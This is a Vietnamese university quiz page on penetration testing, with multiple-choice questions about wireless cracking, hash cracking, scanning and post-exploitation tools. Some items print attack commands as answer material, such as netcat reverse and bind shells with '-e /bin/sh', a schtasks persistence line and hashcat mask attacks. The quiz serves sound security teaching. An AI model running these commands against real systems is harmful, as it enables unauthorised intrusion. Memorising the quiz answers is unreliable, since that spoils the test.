1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh như hình dưới đây: root@xali:~# aircrack-ng -b 12:34:56:78:90:AB /tmp/wpa_output*.cap Mục đích của Tom trong trường hợp này là gì?

C. Bẻ khoá WEP dựa trên gói tin thu được

A. Xác định các mạng hỗ trợ WPS

B. Xác định thông tin về ESSID của AP mà máy nạn nhân đang kết nối

D. Thu thập mật khẩu truy cập cho bộ định tuyến hỗ trợ WPS sau bẻ khoá WPS PIN

1. Jenny thực hiện kiểm thử cho một tổ chức và đã xâm nhập thành công vào một máy chủ windows. Jenny cố gắng duy trì khả năng kết nối lâu dài tới hệ thống máy tính nạn nhân. Câu lệnh nào dưới đây có khả năng thực hiện việc đó?

C. Schtasks.exe /create/tr powershell.exe Sv.ps1/run

A. Net session server | dsquery -user | net use c$

B. Powershell && set-executionpolicy unrestricted

D. Reg save HKLMSystemCurrentControlSetServiceSv.reg

1. Trong quá trình thực hiện kiểm thử, Alice đã thu được NetNTLMv2 hash sử dụng Responder. Lệnh nào dưới đây cho phép người kiểm thử bẻ khóa giá trị hash thu được sử dụng tấn công mặt nạ?

A. hashcat -m 5600 -r rules/bestG4.rule hash.txt wordlist.txt

C. hashcat -m 5600 -o results.text hash.txt wordlist.txt

D. hashcat -m 5600 -a 3 hash.txt ?a?a?a?a?a?a?a?a

1. Tom đang thực hiện kiểm thử cho một công ty và anh ấy lo ngại rằng Web server đang không chạy bản cập nhật phần mềm mới nhất. Câu lệnh nào dưới đây có thể giúp Tom kiểm tra được những lo ngại của anh ấy?

C. nmap -p 80 -sV targetwebsite.com

A. nc -v -p 80 targetwebsite.com

B. hping3 -S -p80 targetwebsite.com

D. nslookup -port-80 targetwebsite.com

1. Trong quá trình kiểm thử mạng không dây, Tom có thu được 1 số lượng lớn các gói tin handshake. Lệnh nào dưới đây cho phép bẻ khoá PSK dựa trên gói tin handshake thu được sử dụng tập từ điểm cho trước?

D. Aircrack-ng -w rockyou.txt -b <target MAC> <outfile>

A. Airodump-ng -c 1 –bssid E4:6F:13:04:CE:31 -w rockyou.txt

B. Airmon-ng -w rockyou.txt -b <target MAC> <outfile>

C. Hashcat -m 2500 WPA.hccapx rockyou.txt

14. Trong quá trình dò quét nmap, Casey sử dụng cờ -O để xác định thông tin về hệ điều hành của hệ thống. Quá trình dò quét xác định được thông tin về hệ thống như sau: Running: Linux 2.6.x OS CPE: cpe: /o: linux:linux_kernel: 2.6 OS details: Linux 2.6.9 – 2.6.33 Casey có thể xác định điều gì từ những thông tin này?

C. Hệ thống đang chạy linux 2.6 kernel trong khoảng giữa .9 và .33

A. Ngày hệ thống được vá lần cuối

B. Thông tin về các bản vá của linux kernel đã được cài đặt

D. Xác định thông tin về bản phân phối linux (linux distribution) được cài đặt trên hệ thống

1. Trong quá trình kiểm thử xâm nhập, Mary thu thập được một số thông tin các thực cấp thấp cho máy chủ linux thông qua tấn công kỹ nghệ xã hội. Sau khi kiểm tra và xác minh các thông tin đăng nhập này, Mary bắt đầu tìm kiếm cách thực hiện tấn công leo thang đặc quyền và cô phát hiện ra thông tin sau: foo@victim:~$ sudo -l User foo may run the following commands on this host: (root) NOPASSWD: ALL foo@victim:~$ Lỗ hổng cấu hình nào được Mary tìm thấy?

D. Quyền truy cập sudo không an toàn

A. Sử dụng SUID/SGID không an toàn

C. Mật khẩu được lưu trữ dưới dạng bản rõ

1. Liam thực hiện kiểm thử cho hệ thống công ty X. Sau khi thực hiện xâm nhập thành công vào hệ thống, cô ấy thực hiện câu lệnh dưới đây trên máy mục tiêu: Liam đang cố gắng thực hiện việc gì? nc 10.1.10.1 6666 -e /bin/sh

D. Thiết lập bind shell sử dụng Netcat

A. Khởi động reverse shell sử dụng Netcat

B. Không có đáp án nào đúng

C. Chặn bắt lưu lượng trên cổng 6666 sử dụng netcat

1. Đối với kiểm thử xâm nhập được tiến hành từ bên trong mạng nội bộ (phía sau các giải pháp bảo vệ vành đai như Firewall, IDS/IPS), việc được cung cấp quyền tiếp cận hạn chế có nghĩa là gì?

D. Người kiểm thử chỉ được cung cấp kết nối ban đầu tới các hệ thống đích

A. Người kiểm thử được cung cấp tài khoản quản trị

B. Người kiểm thử sẽ chỉ được kết nối tới hệ thống đích trong một khoảng thời gian thời hạn

C. Việc truy cập mạng vào các hệ thống hoặc mạng đích sẽ chỉ được phép trong những giờ được xác định trước

1. Tom thực hiện kiểm thử ứng dụng web cho một công ty sử dụng DIRB. Anh ấy muốn dò quét không đệ quy các thư mục trên máy chủ web và tìm kiếm các trang có phần mở rộng là .php. Ngoài ra, mỗi yêu cầu gửi lên phía máy chủ web cần cách nhau một khoảng thời gian xác định để tránh bị phát. Lệnh nào sau đây cho phép anh ấy thực hiện điều này?

C. dirb http://www.webpentest.com -r -X php -z 100

A. dirb http://www.webpentest.com -o php -N 302

B. dirb http://www.webpentest.com -X php -z 100 -v

D. dirb http://www.webpentest.com -z 10 -o php

1. Khi thực hiện kiểm thử xâm nhập, Charles sử dụng nmap để dò quét hệ thống mục tiêu bằng lệnh sau: nmap -sT -sV -T2 -p 1-65535 example.com Sau khi xem quá trình dò quét chạy trong hơn 2 giờ đồng hồ, anh ấy nhận ra rằng mình cần phải tối ưu hoá câu lệnh dò quét. Phương án nào dưới đây KHÔNG phải là cách hữu ích để tăng tốc độ dò quét?

A. Chỉ quét UDP để cải thiện tốc độ

B. Thay đổi mẫu thời gian từ -T2 sang thành -T3 hoặc -T4

C. Sử dụng danh sách cổng mặc định

D. Chuyển sang sử dụng SYN scan

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện lệnh: root@xali:/tmp# airodump-ng -c 4 --bssid 12:34:56:78:90:AB -w airodump_output wlan0mon Mục đích của Tom trong trường hợp này là gì?

B. Thu thập lưu lượng truy cập từ AP và lưu vào tập tin PCAP

A. Bẻ khoá PSK được sử dụng để kết nỗi với điểm truy cập không dây

C. Lắng nghe các beacon frame để gửi một yêu cầu kết nối tới AP có địa chỉ BSSID 12:34:56:78:AB

D. Tiến hành tấn công brute force PIN WPS để có được quyền truy cập mật khẩu của AP

1. Renee đang tiến hành một cuộc kiểm thử xâm nhập và phát hiện ra bằng chứng cho thấy một trong những hệ thống của công ty khách hàng đã bị tấn công. Renee nên làm gì ngay sau khi xác nhận các nghi ngờ của mình?

B. Báo cáo ngay các thông tin về bằng chứng tấn công cho khách hàng

A. Không cần thực hiện thêm hành động nào vi phạm vì công việc của Renee chỉ giới hạn trong việc thực hiện kiểm thử

C. Ghi lại các chi tiết trong báo cáo kiểm thử xâm nhập

D. Khắc phục lỗ hổng cho phép Renee có quyền truy cập

1. Trong quá trình kiểm thử mạng không dây, Tom thực hiện câu lệnh: root@kalo:~#aireplay-ng -0 0 -a 12:34:56:78:90:AB -c FE:DC:BA:09:87:65 wlan0… Mục đích của Tom trong trường hợp này là gì?

B. Thực hiện tấn công từ chối dịch vụ bằng cách gửi deauthentication frame tới các thiết bị đang kết nối trong mạng không dây

A. Khôi phục mật khẩu WPA từ WPS PIN

C. Thiết lập proxy để thực hiện tấn công SSL strip lên các yêu cầu HTTPS

D. Thu thập thông tin về quá trình bắt tay 4 bước trong mạng không dây

1. Trong quá trình kiểm thử ứng dụng web, Jack phát hiện ra một số lỗ hổng nghiêm trọng. Anh ấy muốn lợi dụng các lỗ hổng này để tạo một tài khoản trái phép. Những tấn công nào dưới đây có thể được liên kết với nhau để dẫn đến việc tạo thành công tài khoản của Jack?

C. Insecure direct object reference, Code injection

A. CSRF, Insecure direct object reference

B. Code injection, Directory traversal

kiemthu1908

Authored by Hiếu Doãn

Other

University

Used 6+ times

AI Actions

Add similar questions

Adjust reading levels

Convert to real-world scenario

Translate activity

More...

Content View

Student View

69 questions

Show all answers

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Sau một số nỗ lực khai thác lỗi từ một trang web mục tiêu đã tạo ra thông báo lỗi như sau: Server error in ‘/’ application. Điều nào dưới đây mô tả đúng nhất về thông báo lỗi trả về?

A. Trang web có thể tồn tại lỗ hổng XSS

B. Trang web có thể tồn tại lỗ hổng SQL injection

C. Trang web có thể tồn tại lỗ hổng CSRF

D. Trang web có thể tồn tại lỗ hổng tràn bộ đệm

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Trong quá trình kiểm thử hệ thống, Peter muốn tiêm shellcode của mình vào một số chương trình hợp lệ trên hệ thống Windows như calc.exe, mspaint.exe để kiểm tra khả năng bypass antivirus. Công cụ nào sau đây được phát triển cho mục đích này?

A. Meterpreter

B. Powershell

C. Shellter

D. Metasploit

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Thuật ngữ nào được sử dụng để mô tả các cuộc tấn công sử dụng kết nối Bluetooth của thiết bị để lấy cắp thông tin?

A. NCF cloning

B. Bluesnarfing

C. BlueBorne

D. Wardriving

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Công cụ nào dưới đây thường được sử dụng để thu thập một số thông tin về máy chủ & ứng dụng web như Platform, CMS Platform, Server headers, Cookie, Type of Script…?

A. Whatweb

B. OpenVas

C. Wpscan

D. W3af

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Sau khi xâm nhập một máy chủ từ xa có địa chỉ 102.15.8.13, Cameron thực hiện câu lệnh sau trên máy chủ từ xa: H31 nc -lvp 4444 -e /bin/bash Trường hợp Cameron muốn tạo bind shell, lệnh nào sau đây cần được thực hiện trên máy tính của anh ấy?

A. Nc 102.15.8.13 4444

B. Nc -e /bin/bash -lvp 4444

C. Nc -lvp 4444 102.15.8.13

D. Nc 102.15.8.13 -e /bin/bash

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Kẻ tấn công lừa người dùng truy cập vào một trang web độc hại thông qua e-mail lừa. Người dùng nhấp vào liên kết e-mail và truy cập trang web độc hại trong khi vẫn duy trì phiên hoạt động được xác thực với ngân hàng của mình. Kẻ tấn công thông qua trang web độc hại đã chỉ thị cho trình duyệt của người dùng gửi yêu cầu đến trang web ngân hàng mà người dùng không hề hay biết. Đây là dạng tấn công nào?

A. CSRF

B. Hidden form field

C. XSS

D. CSPP (connection string parameter pollution)

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

1. Steve đang tham gia kiểm thử xâm nhập một hệ thống của khách hàng và tiến hành thu thập thông tin mà không cần thực hiện dò quét hoặc thực hiện các tấn công thăm dò mục tiêu. Steve đang sử dụng phương pháp thu thập thông tin nào?

A. Enumeration

B. Active

C. OSINT

D. Port scanning

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

64 questions

TỪ VỰNG BÀI 1-6 (2)

Quiz

•

University

70 questions

Kiểm thử phần mềm

Quiz

•

University

68 questions

Kiểm tra môn VLM

Quiz

•

University

70 questions

Pháp luật FA24

Quiz

•

University

72 questions

quizizzHDV2

Quiz

•

University

70 questions

Công nghệ 11_Luyện tập_GK1

Quiz

•

6th Grade - University

70 questions

Bộ câu hỏi kĩ năng mềm HUST 1

Quiz

•

University

65 questions

ôn tập kiểm tra giữa kỳ K12_2024-2025

Quiz

•

12th Grade - University

Popular Resources on Wayground

8 questions

2 Step Word Problems

Quiz

•

KG - University

20 questions

Comparing Fractions

Quiz

•

4th Grade

15 questions

Fractions on a Number Line

Quiz

•

3rd Grade

20 questions

Equivalent Fractions

Quiz

•

3rd Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

10 questions

Latin Bases claus(clois,clos, clud, clus) and ped

Quiz

•

6th - 8th Grade

$fractions$

22 questions

fractions

Quiz

•

3rd Grade

7 questions

The Story of Books

Quiz

•

6th - 8th Grade

Discover more resources for Other

8 questions

2 Step Word Problems

Quiz

•

KG - University

7 questions

Comparing Fractions

Interactive video

•

1st Grade - University

7 questions

Force and Motion

Interactive video

•

4th Grade - University

10 questions

14.2 Independent/Dependent Variables

Quiz

•

KG - University

18 questions

Great Lakes States

Quiz

•

KG - University

7 questions

DNA, Chromosomes, Genes, and Traits: An Intro to Heredity

Interactive video

•

11th Grade - University

7 questions

Reflexive Verbs in Spanish

Lesson

•

9th Grade - University

7 questions

Narrative Writing 1

Interactive video

•

4th Grade - University